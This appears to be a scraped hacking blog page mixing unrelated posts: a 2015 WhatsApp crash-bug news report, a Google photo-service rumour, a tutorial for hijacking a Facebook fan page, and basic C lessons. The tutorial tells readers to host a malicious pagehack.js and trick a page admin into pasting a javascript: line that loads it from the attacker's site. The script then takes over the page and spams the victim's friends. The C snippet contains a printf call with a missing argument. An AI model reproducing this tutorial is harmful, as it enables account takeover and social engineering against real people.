hack whats up massege

Sunday, May 24, 2015


A Vulnerability has been discovered in the wildly popular messaging app WhatsApp, which allows anyone to remotely crash WhatsApp just by sending a specially crafted message, two security researchers reported ‘ The Hacker News’. Two India based independent security researchers, Indrajeet Bhuyan and Saurav Kar, both 17-year old teenagers demonstrated the WhatsApp Message Handler vulnerability to one of our security analyst. In a video demonstration, they showed that how a 2000 words (2kb in size) message in special character set can crash Whatsapp messenger app. Previous it was discovered that sending a huge message ( greater than 7mb in size) on Whatsapp could crash victim device and app immediately, but using this new exploit attacker only need to send a very small size (approx 2kb) message to the victim. The worried impact of the vulnerability is that the user who received the specially crafted message will have to delete his/her whole conversation and start a fresh chat, because opening the message keeps on crashing WhatsApp unless the chat is deleted completely. "What makes it more serious is that one needs to delete entire chat with the person they are chatting to in order to get back whatsapp work in normal ," Bhuyan told THN in an e- mail. According to the duo, the reported vulnerability has been tested and successfully works on most of the versions of Android Operating system including Jellybean, Kitkat, and all the below android versions. Similarly, Any member of your WhatsApp group could intentionally send a specially crafted message to exit people from the group and delete the group. Also, for example, if I don’t want someone to keep records of my chat with them, then I can also send the same message exploit to the person. The vulnerability has not been tested on iOS, but it is sure that all versions of WhatsApp including 2.11.431 and 2.11.432 are affected with this bug. Also the attack does not work on Windows 8.1. They have also provided the Proof-of- Concept (PoC) video for the attack, users can watch above. WhatsApp, bought by Facebook for $19 billion in February this year, has 600 Million users as of October 2014, and according to the researchers, an estimated number of users affected by the vulnerability could be 500 Million. WhatsApp was in news recently for making end-to-end encryption on all text messages as a default feature in an effort to boost the online privacy and security of its users around the world. The app maker describe this move as the "largest deployment of end-to-end encryption ever.

Google to Introduce New Photo-Sharing Platform to Kill Instagram


Google is reportedly going to launch a new online photo-sharing service and storage option at its developer conference later this month, which Bloomberg says, will not be a part of its Google+ social network. At the moment, Google offers a photo sharing service known as "Google+ Photos," which comes pre-installed with every Android device. Google+ Photos automatically backs up photos in the device to Google cloud storage. However, the new photo service will not be a part of Google+ network . It seems like the company’s attempts to bolster its product lineup and compete with the increasingly popular rivals like Facebook or Twitter to grow its user base. Just the way like Facebook, who acquired the popular mobile photo-sharing service Instagram in 2012 and increased its user base to more than 300 Million users in one shot. There aren’t many details about How the new Google photo service will work? Whether the online photo storage part of the service will be free? Or... Whether the search engine will charge you to store large chunks of photos on the new tool? However, the source says that the new photo sharing tool, earlier rumored as Google Photos spinoff, will allow users to share their images with other social networking sites such as Facebook and Twitter. We’ll soon have more details on Google’s new photos service as the search engine giant is most likely to unveil its independent photo sharing service at Google I/O annual software developers’ conference in San Francisco at the end of the month. Apart from the new photo service, Google is also expected to unveil some new features. Android for Work, a new Android OS called Android M for now, and new voice commands to access Android devices are among them.Hdetwt

Facebook Password Hacking : How To Hack Admin Facebook Fan Page :D

Saturday, May 23, 2015

Hello fans! Many of my site visitors asked me about how to hack Facebook fan page. As Facebook Fan Page is an excellent platform for communication and for spreading our bussiness in world, as a reason if which it has become the number one target of hackers.

Today in this article I am going to explain you how to hack Facebook fan page using javascript. As we all know its difficult to hack Facebook fan page but using this method you can hack Facebook fan page easily.

 Hack Facebook Fan Admin Page

Now lets start the tutorial of facebook fan page hacking . First of all we will need to setup an exploit and a website to host that exploit. If you already have a registed hosting account then its great otherwise there are couple of free hosting websites that can be used for such purposes like 000webhost.com etc.

Facebook Password Hacking : Steps To Hack Admin Facebook Fan Page

Step 1: First download Facebook page hacking exploit.

Password : www.wildhacker.com

Step 2: Now open the pagehack.js [in package] with notepad and search for nk@wildhacker.com and change nk@wildhacker.com with your facebook email.

Step 3: Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text Hey See what i got! and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15.

Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js) and then save it.

Step 4: Now create a account on free hosting like 0fess.net or 000webhost.com ( 110mb won t help this time)and upload facebook page hacking exploit on your free hosting website. you will get url address something like this,

www.yoursite.com/pagehack.js

Step 5: Now ask victim to paste this in browser address bar, He must be admin of page, which you wants to hack:

javascript:(a = (b = document).createElement("script")).src = "http://www.yourwbesite.com/pagehack.js", b.body.appendChild(a); void(0)

Note : Change scr = http://www.yourwbesite.com/pagehack.js in javascript with your own address.

Tip: Tell him that it will make your page safe, or something else like attracting.

When he will put this key in address bar and that's it you will get a notification that you are admin of his page now.

Enjoy, But don't hack for bad cause, I will not be responsible for any consequences made by you.

Thats it..

I hope you will be able to hack any Facebook fan page after reading this post.please do comment share and like this post if the information below is helpful to you.

Enjoy hacking..........

ACCI CODE LETTERS A>>>>>>Z

#include<stdio.h>
#include<conio.h>
 void main ()
 {
     char ch='a';
     while(ch!='\r')
     {
         printf("Enter the letter you

want:\n");
         ch=getch();
         printf("%d\n");
         printf("\The Chracter you

enter%c Is %d. \n" ,ch,ch);
     }
     getch();
    
    
    
 }
If you get error let us know comment in the below section Thanks

C Programming Arrays

Sunday, May 10, 2015

In C programming, one of the frequently arising problem is to handle similar types of data. For example: If the user want to store marks of 100 students. This can be done by creating 100 variable individually but, this process is rather tedious and impracticable. These type of problem can be handled in C programming using arrays.
An array is a sequence of data item of homogeneous value(same type).
Arrays are of two types:
  1. One-dimensional arrays
  2. Multidimensional arrays( will be discussed in next chapter )